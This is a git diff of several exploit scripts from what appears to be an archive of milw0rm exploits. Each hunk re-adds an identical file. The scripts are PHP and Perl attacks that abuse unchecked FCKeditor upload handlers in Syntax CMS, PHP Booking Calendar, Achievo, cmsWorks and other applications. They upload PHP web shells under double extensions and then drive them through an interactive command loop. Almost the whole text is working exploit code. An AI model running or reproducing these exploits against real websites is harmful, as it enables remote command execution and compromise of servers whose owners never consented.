{$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Content-Length: ".strlen($data)."\r\n"; -$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; -$packet .= "Connection: 
close\r\n\r\n"; -$packet .= $data; -preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); -if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n"); -else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; -define(STDIN, fopen("php://stdin", "r")); -while(1) -{ - print "\nstack-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} -?> - -# milw0rm.com [2008-05-29] + special THanks to EgiX For the Exploit Code + + author...: Stack + mail.....: Ev!L + descr: + if the web site change the name of path or path is /public/ you can delet /public/ in the exploit + in the line : + "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php + [-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php + + 41. // Get the posted file. + 42. $oFile = $_FILES['NewFile'] ; + 43. + 44. // Get the uploaded file name and extension. + 45. $sFileName = $oFile['name'] ; + 46. $sOriginalFileName = $sFileName ; + 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ; + 48. $sExtension = strtolower( $sExtension ) ; + 49. + 50. // The the file type (from the QueryString, by default 'File'). + 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ; + 52. + 53. // Check if it is an allowed type. + 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) ) + 55. SendResults( 1, '', '', 'Invalid type specified' ) ; + 56. + 57. // Get the allowed and denied extensions arrays. + 58. 
$arAllowed = $Config['AllowedExtensions'][$sType] ; + 59. $arDenied = $Config['DeniedExtensions'][$sType] ; + 60. + 61. // Check if it is an allowed extension. + 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) + 63. SendResults( '202' ) ; + 64. + 65. $sErrorNumber = '0' ; + 66. $sFileUrl = '' ; + 67. + 68. // Initializes the counter used to rename the file, if another one with the same name already exists. + 69. $iCounter = 0 ; + 70. + 71. // The the target directory. + 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) + 73. $sServerDir = $Config['UserFilesAbsolutePath'] ; + 74. else + 75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; + 76. $sServerDir = $Config["UserFilesPath"] ; + 77. + 78. while ( true ) + 79. { + 80. // Compose the file path. + 81. $sFilePath = $sServerDir . $sFileName ; + 82. + 83. // If a file with that name already exists. + 84. if ( is_file( $sFilePath ) ) + 85. { + 86. $iCounter++ ; + 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; + 88. $sErrorNumber = '201' ; + 89. } + 90. else + 91. { + 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; + 93. + 94. if ( is_file( $sFilePath ) ) + 95. { + 96. $oldumask = umask(0) ; + 97. chmod( $sFilePath, 0777 ) ; + 98. umask( $oldumask ) ; + 99. } + 100. + 101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ; + 102. + 103. 
break ; + + with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code +*/ +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} +print "\n+------------------------------------------------------------+"; +print "\n| Syntax CMS <= 1.3 Arbitrary File Upload Exploit by Stack |"; +print "\n+------------------------------------------------------------+\n"; +if ($argc < 2) +{ + print "\nUsage......: php $argv[0] host path"; + print "\nExample....: php $argv[0] localhost /Syntax/\n"; + die(); +} +$host = $argv[1]; +$path = $argv[2]; +$data = "--12345\r\n"; +$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; +$data .= "Content-Type: application/octet-stream\r\n\r\n"; +$data .= "\n"; +$data .= "--12345--\r\n"; +$packet = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($data)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $data; +preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); +if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); +else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; +define(STDIN, fopen("php://stdin", "r")); +while(1) +{ + print "\nstack-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} +?> + +# milw0rm.com [2008-05-29] diff --git a/platforms/php/webapps/5691.php b/platforms/php/webapps/5691.php index be6cc151a..17b8dff19 100755 --- a/platforms/php/webapps/5691.php +++ b/platforms/php/webapps/5691.php 
@@ -1,133 +1,133 @@ -\n"; -$data .= "--12345--\r\n"; - -$packet = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Content-Length: ".strlen($data)."\r\n"; -$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; -$packet .= "Connection: close\r\n\r\n"; -$packet .= $data; - -preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); - -if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n"); -else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; - -define(STDIN, fopen("php://stdin", "r")); - -while(1) -{ - print "\ncmsfs-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}{$html[3]} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} - -?> - -# milw0rm.com [2008-05-29] +\n"; +$data .= "--12345--\r\n"; + +$packet = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($data)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $data; + +preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); + +if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); +else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; + +define(STDIN, fopen("php://stdin", "r")); + +while(1) +{ + print "\ncmsfs-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}{$html[3]} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} + +?> + +# milw0rm.com [2008-05-29] diff --git a/platforms/php/webapps/5697.php b/platforms/php/webapps/5697.php index 3a21c92cc..73b0b32cb 100755 --- a/platforms/php/webapps/5697.php +++ b/platforms/php/webapps/5697.php 
@@ -1,137 +1,137 @@ - 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) - 63. SendResults( '202' ) ; - 64. - 65. $sErrorNumber = '0' ; - 66. $sFileUrl = '' ; - 67. - 68. // Initializes the counter used to rename the file, if another one with the same name already exists. - 69. $iCounter = 0 ; - 70. - 71. // The the target directory. - 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) - 73. $sServerDir = $Config['UserFilesAbsolutePath'] ; - 74. else - 75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; - 76. $sServerDir = $Config["UserFilesPath"] ; - 77. - 78. while ( true ) - 79. { - 80. // Compose the file path. - 81. $sFilePath = $sServerDir . $sFileName ; - 82. - 83. // If a file with that name already exists. - 84. if ( is_file( $sFilePath ) ) - 85. { - 86. $iCounter++ ; - 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; - 88. $sErrorNumber = '201' ; - 89. } - 90. else - 91. { - 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; - 93. - 94. if ( is_file( $sFilePath ) ) - 95. { - 96. $oldumask = umask(0) ; - 97. chmod( $sFilePath, 0777 ) ; - 98. umask( $oldumask ) ; - 99. } - 100. - 101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ; - 102. - 103. 
break ; - - with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code -*/ -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} -print "\n+------------------------------------------------------------+"; -print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |"; -print "\n+------------------------------------------------------------+\n"; -if ($argc < 2) -{ - print "\nUsage......: php $argv[0] host path"; - print "\nExample....: php $argv[0] localhost /booking_calendar/\n"; - die(); -} -$host = $argv[1]; -$path = $argv[2]; -$data = "--12345\r\n"; -$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; -$data .= "Content-Type: application/octet-stream\r\n\r\n"; -$data .= "\n"; -$data .= "--12345--\r\n"; -$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Content-Length: ".strlen($data)."\r\n"; -$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; -$packet .= "Connection: close\r\n\r\n"; -$packet .= $data; -preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); -if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); -else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; -define(STDIN, fopen("php://stdin", "r")); -while(1) -{ - print "\nstack-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} -?> - -# milw0rm.com [2008-05-29] + 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) + 63. SendResults( '202' ) ; + 64. + 65. $sErrorNumber = '0' ; + 66. $sFileUrl = '' ; + 67. + 68. // Initializes the counter used to rename the file, if another one with the same name already exists. + 69. $iCounter = 0 ; + 70. + 71. // The the target directory. + 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) + 73. $sServerDir = $Config['UserFilesAbsolutePath'] ; + 74. else + 75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; + 76. $sServerDir = $Config["UserFilesPath"] ; + 77. + 78. while ( true ) + 79. { + 80. // Compose the file path. + 81. $sFilePath = $sServerDir . $sFileName ; + 82. + 83. // If a file with that name already exists. + 84. if ( is_file( $sFilePath ) ) + 85. { + 86. $iCounter++ ; + 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; + 88. $sErrorNumber = '201' ; + 89. } + 90. else + 91. { + 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; + 93. + 94. if ( is_file( $sFilePath ) ) + 95. { + 96. $oldumask = umask(0) ; + 97. chmod( $sFilePath, 0777 ) ; + 98. umask( $oldumask ) ; + 99. } + 100. + 101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ; + 102. + 103. 
break ; + + with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code +*/ +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} +print "\n+------------------------------------------------------------+"; +print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |"; +print "\n+------------------------------------------------------------+\n"; +if ($argc < 2) +{ + print "\nUsage......: php $argv[0] host path"; + print "\nExample....: php $argv[0] localhost /booking_calendar/\n"; + die(); +} +$host = $argv[1]; +$path = $argv[2]; +$data = "--12345\r\n"; +$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; +$data .= "Content-Type: application/octet-stream\r\n\r\n"; +$data .= "\n"; +$data .= "--12345--\r\n"; +$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($data)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $data; +preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); +if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); +else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; +define(STDIN, fopen("php://stdin", "r")); +while(1) +{ + print "\nstack-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} +?> + +# milw0rm.com [2008-05-29] diff --git a/platforms/php/webapps/5770.php b/platforms/php/webapps/5770.php index cb6521f4f..8af7f549d 100755 --- a/platforms/php/webapps/5770.php +++ b/platforms/php/webapps/5770.php 
@@ -1,125 +1,125 @@ - array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"), - - with a default configuration of this script, an attacker might be able to upload arbitrary - files containing malicious PHP code due to multiple file extensions isn't properly checked -*/ - -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); - -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} - -function upload() -{ - global $host, $path; - - $connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php"; - $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv"); - - foreach ($file_ext as $ext) - { - print "\n[-] Trying to upload with .{$ext} extension..."; - - $data = "--12345\r\n"; - $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n"; - $data .= "Content-Type: application/octet-stream\r\n\r\n"; - $data .= "\r\n"; - $data .= "--12345--\r\n"; - - $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Content-Length: ".strlen($data)."\r\n"; - $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $packet .= $data; - - preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html); - - if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]}: {$html[2]})\n"); - - $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $html = http_send($host, $packet); - - if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; - - sleep(1); - } - - return false; -} - -print "\n+--------------------------------------------------------------------+"; -print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |"; -print "\n+--------------------------------------------------------------------+\n"; - -if ($argc < 3) -{ - print "\nUsage......: php $argv[0] host path\n"; - print "\nExample....: php $argv[0] localhost /"; - print "\nExample....: php $argv[0] localhost /achievo/\n"; - die(); -} - -$host = $argv[1]; -$path = $argv[2]; - -if (!($ext = upload())) die("\n\n[-] Exploit failed...\n"); -else print "\n[-] Shell uploaded...starting it!\n"; - -define(STDIN, fopen("php://stdin", "r")); - -while(1) -{ - print "\nachievo-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $html = http_send($host, $packet); - if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $html); - print "\n{$shell[1]}"; - } - else break; -} - -?> - -# milw0rm.com [2008-06-09] + array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"), + + with a default configuration of this script, an attacker might be able to upload arbitrary + files containing malicious PHP code due to multiple file extensions isn't properly checked +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); + +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock 
= fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} + +function upload() +{ + global $host, $path; + + $connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php"; + $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv"); + + foreach ($file_ext as $ext) + { + print "\n[-] Trying to upload with .{$ext} extension..."; + + $data = "--12345\r\n"; + $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n"; + $data .= "Content-Type: application/octet-stream\r\n\r\n"; + $data .= "\r\n"; + $data .= "--12345--\r\n"; + + $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Content-Length: ".strlen($data)."\r\n"; + $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $packet .= $data; + + preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html); + + if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]}: {$html[2]})\n"); + + $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $html = http_send($host, $packet); + + if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; + + sleep(1); + } + + return false; +} + +print "\n+--------------------------------------------------------------------+"; +print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |"; +print "\n+--------------------------------------------------------------------+\n"; + +if ($argc < 3) +{ + print "\nUsage......: php $argv[0] host path\n"; + print "\nExample....: php $argv[0] localhost /"; + print "\nExample....: php $argv[0] localhost /achievo/\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +if (!($ext = upload())) die("\n\n[-] Exploit failed...\n"); +else print "\n[-] Shell uploaded...starting it!\n"; + +define(STDIN, fopen("php://stdin", "r")); + +while(1) +{ + print "\nachievo-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $html = http_send($host, $packet); + if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $html); + print "\n{$shell[1]}"; + } + else break; +} + +?> + +# milw0rm.com [2008-06-09] diff --git a/platforms/php/webapps/5844.php b/platforms/php/webapps/5844.php index 3218f8900..596005ba0 100755 --- a/platforms/php/webapps/5844.php +++ b/platforms/php/webapps/5844.php 
@@ -1,73 +1,73 @@ -\n"; -$data .= "--12345--\r\n"; -$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Content-Length: ".strlen($data)."\r\n"; -$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; -$packet .= "Connection: close\r\n\r\n"; -$packet .= $data; -preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); -if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n"); -else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; -define(STDIN, fopen("php://stdin", "r")); -while(1) -{ - print "\nstack-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} -?> - -# milw0rm.com [2008-06-17] +\n"; +$data .= "--12345--\r\n"; +$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($data)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $data; +preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); +if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); +else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; +define(STDIN, fopen("php://stdin", "r")); +while(1) +{ + print "\nstack-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} +?> + +# milw0rm.com [2008-06-17] diff --git a/platforms/php/webapps/5907.pl b/platforms/php/webapps/5907.pl index 59c2bc74a..435229b1e 100755 --- a/platforms/php/webapps/5907.pl +++ b/platforms/php/webapps/5907.pl 
@@ -1,29 +1,29 @@ -#!/usr/bin/perl -use strict; -use warnings; -use LWP::UserAgent; -use HTTP::Request::Common; -print <); - -print "Enter File Path(path to local file to upload): "; - chomp(my $file=); -my $ua = LWP::UserAgent->new; -my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php', - Content_Type => 'form-data', - Content => [ NewFile => $file ] ); -if($re->is_success) { - if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; } - else { print "File Upload Is Disabled! Failed!\n"; } -} else { print "HTTP Request Failed!\n"; } -exit; - -# milw0rm.com [2008-06-23] +#!/usr/bin/perl +use strict; +use warnings; +use LWP::UserAgent; +use HTTP::Request::Common; +print <); + +print "Enter File Path(path to local file to upload): "; + chomp(my $file=); +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php', + Content_Type => 'form-data', + Content => [ NewFile => $file ] ); +if($re->is_success) { + if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; } + else { print "File Upload Is Disabled! Failed!\n"; } +} else { print "HTTP Request Failed!\n"; } +exit; + +# milw0rm.com [2008-06-23] diff --git a/platforms/php/webapps/5922.php b/platforms/php/webapps/5922.php index 4d0ff283d..2687d9c06 100755 --- a/platforms/php/webapps/5922.php +++ b/platforms/php/webapps/5922.php 
@@ -1,112 +1,112 @@ - array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"), - - with a default configuration of this script, an attacker might be able to upload arbitrary - files containing malicious PHP code due to multiple file extensions isn't properly checked -*/ -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} -function upload() -{ - global $host, $path; - - $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php"; - $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv"); - - foreach ($file_ext as $ext) - { - print "\n[-] Trying to upload with .{$ext} extension..."; - - $data = "--12345\r\n"; - $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n"; - $data .= "Content-Type: application/octet-stream\r\n\r\n"; - $data .= "\r\n"; - $data .= "--12345--\r\n"; - - $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Content-Length: ".strlen($data)."\r\n"; - $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $packet .= $data; - - preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html); - - if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]}: {$html[2]})\n"); - - $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $html = http_send($host, $packet); - - if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; - - sleep(1); - } - - return false; -} -print "\n+--------------------------------------------------------------------+"; -print "\n| cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit |"; -print "\n+--------------------------------------------------------------------+\n"; -if ($argc < 3) -{ - print "\nUsage......: php $argv[0] host path\n"; - print "\nExample....: php $argv[0] localhost /"; - print "\nExample....: php $argv[0] localhost /achievo/\n"; - die(); -} -$host = $argv[1]; -$path = $argv[2]; -if (!($ext = upload())) die("\n\n[-] Exploit failed...\n"); -else print "\n[-] Shell uploaded...starting it!\n"; -define(STDIN, fopen("php://stdin", "r")); -while(1) -{ - print "\nStack-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $html = http_send($host, $packet); - if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $html); - print "\n{$shell[1]}"; - } - else break; -} -?> - -# milw0rm.com [2008-06-23] + 